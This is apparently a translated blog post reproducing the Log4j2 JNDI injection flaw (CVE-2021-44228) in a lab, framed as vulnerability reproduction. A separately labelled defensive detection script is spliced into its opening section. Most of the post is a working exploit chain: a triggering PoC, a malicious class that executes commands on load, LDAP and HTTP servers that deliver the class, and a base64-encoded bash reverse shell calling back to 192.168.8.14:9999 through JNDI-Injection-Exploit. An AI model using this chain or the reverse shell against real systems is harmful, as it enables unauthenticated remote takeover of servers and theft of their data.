Apache Log4j2 Code Execution Vulnerability Reproduction (CVE-2021-44228)

1. Vulnerability description

log4j is an Apache open source project: a Java-based logging framework. Log4j2 is the successor of log4j and is widely used in business system development to record log information; the systems of many Internet companies and other well-known companies use this framework.

The Log4j2 component has a JNDI injection flaw in the way it processes log records: the lookup feature provided by Log4j2 lets a log message read configuration from the environment through several protocols, but the component does not strictly validate this input. An unauthenticated attacker can therefore send carefully constructed malicious data to the target server, trigger the parsing flaw in the log4j2 component, achieve arbitrary code execution on the target server and take control of it.

Once logging through the Apache Log4j2 component is enabled, exploit code inserted at any point that ends up in an error log can trigger the vulnerability. In special cases, if the logs recorded by this component include logs from other systems, indirect poisoning is possible: the component reads the attack string indirectly through the intermediate system, which also triggers the vulnerability.
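Because the trigger is simply a `${jndi:...}` lookup string reaching a logged field, defenders can hunt for it in access logs and request headers. The following detection routine is an added example (not part of the original post): it URL-decodes each line, collapses the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups that attackers use to hide the literal word "jndi", and reports the JNDI scheme found. The sample log lines are constructed for the example and reuse the 127.0.0.1:8899 listener address from the walkthrough.

```python
import re
from urllib.parse import unquote

# Nested lookups that Log4j 2.x resolves before the outer ${jndi:...} is evaluated.
# They are used to split the literal string "jndi" so that naive matching misses it.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")   # ${::-j}, ${env:NOSUCH:-j}
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http):", re.I)


def normalize(value: str, max_rounds: int = 16) -> str:
    """URL-decode and collapse nested lookups that evaluate to plain characters."""
    value = unquote(unquote(value))  # handles single and double percent-encoding
    for _ in range(max_rounds):
        before = value
        value = _LOWER.sub(lambda m: m.group(1).lower(), value)
        value = _UPPER.sub(lambda m: m.group(1).upper(), value)
        value = _DEFAULT.sub(lambda m: m.group(1), value)
        if value == before:   # innermost lookups resolved first; stop when stable
            break
    return value


def jndi_lookup_scheme(value: str):
    """Return the JNDI scheme (e.g. 'ldap') if the input carries a lookup, else None."""
    m = _JNDI.search(normalize(value))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """Yield (line_number, scheme) for each log line carrying a JNDI lookup."""
    for n, line in enumerate(lines, 1):
        scheme = jndi_lookup_scheme(line)
        if scheme:
            yield n, scheme


# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://127.0.0.1:8899/Log4jRCE}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://127.0.0.1:8899/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://127.0.0.1:1099/a}"',
    '10.0.0.10 - - "GET /?q=%24%7B%24%7Benv%3ANOSUCH%3A-j%7Dndi%3Aldap%3A%2F%2F127.0.0.1%3A8899%2Fa%7D HTTP/1.1" 200 "-"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "price is ${ctx:currency} ${date:yyyy}"',
]
```

Lines flagged by `scan_log` should be correlated with outbound LDAP/RMI connections from the JVM host; the actual fix is upgrading Log4j2 out of the affected range given in section 2.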

The vulnerability also affects many widely used open source components, such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.

2. Scope of influence

User authentication: not required

Trigger method: remote

Configuration: default

Exploitation condition: requires external network access to the target

Affected versions: 2.0 ≤ Apache Log4j2 < 2.15.0-rc2

Exploitation difficulty: extremely low; remote code execution without authorization

Threat level: critical; allows remote code execution

Overall assessment: the exploitation difficulty is extremely low, the prerequisites are few, the scope of impact is very large and the harm is extremely severe. The vulnerability is already being publicly exploited, with attackers continuously scanning the whole Internet, and according to the ministry's requirements it must be fixed urgently.

3. Vulnerability reproduction

1. Create a maven project and import the log4j dependency package

pom.xml is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-rce</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

</project>


2. Write POC

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {

    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // Allow the LDAP reference to load a class from a remote codebase.
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // The logged string is resolved by the JNDI lookup, which triggers the flaw.
        logger.error("${jndi:ldap://127.0.0.1:8899/Log4jRCE}");
    }
}

3. Write malicious classes

public class Log4jRCE {

    // Runs when the class is loaded by the JNDI lookup.
    static {
        try {
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Then compile it into a class file:

javac Log4jRCE.java

Note: do not put Log4jRCE.java inside the project. I placed Log4jRCE.class in a separate directory; otherwise, when log4j.java runs, it will load the local Log4jRCE class and not download it over HTTP.

4. Start http service

Use Python to start an HTTP server in the directory where the malicious class file is stored:

python2 -m SimpleHTTPServer 1234

Verify in the browser that the file is served.

5. Compile and start LDAP service

Download the marshalsec project: https://github.com/mbechler/marshalsec

Under Java 8, build it with maven to generate the corresponding jar package:

mvn clean package -DskipTests

Start the LDAP service, listening on port 8899, and specify the remote class Log4jRCE.class to be loaded:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.8.14:1234/#Log4jRCE" 8899


6. Run POC

Run log4j.java; it fetches the malicious class and executes the "calc" command written in it.

4. Reverse shell

1. Target environment setup

Use docker to pull the vulnerable image:

docker pull vulfocus/log4j2-rce-2021-12-09:latest

Start the vulnerable environment:

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

2. Access the vulnerable environment to confirm that it has been deployed successfully.

3. Start the RMI and LDAP services

Reverse shell command:

bash -i >& /dev/tcp/192.168.8.14/9999 0>&1

Visit the URL https://www.jackson-t.ca/runtime-exec-payloads.html and transform the reverse shell command into a form usable with exec(), as follows:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

Use JNDI-Injection-Exploit (https://github.com/welk1n/JNDI-Injection-Exploit) to start the RMI and LDAP servers:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.8.14"

4. Start an nc listener

5. Verify in the Firefox browser

6. Reverse shell obtained successfully

Source: blog.csdn.net/guo15890025019/article/details/121869697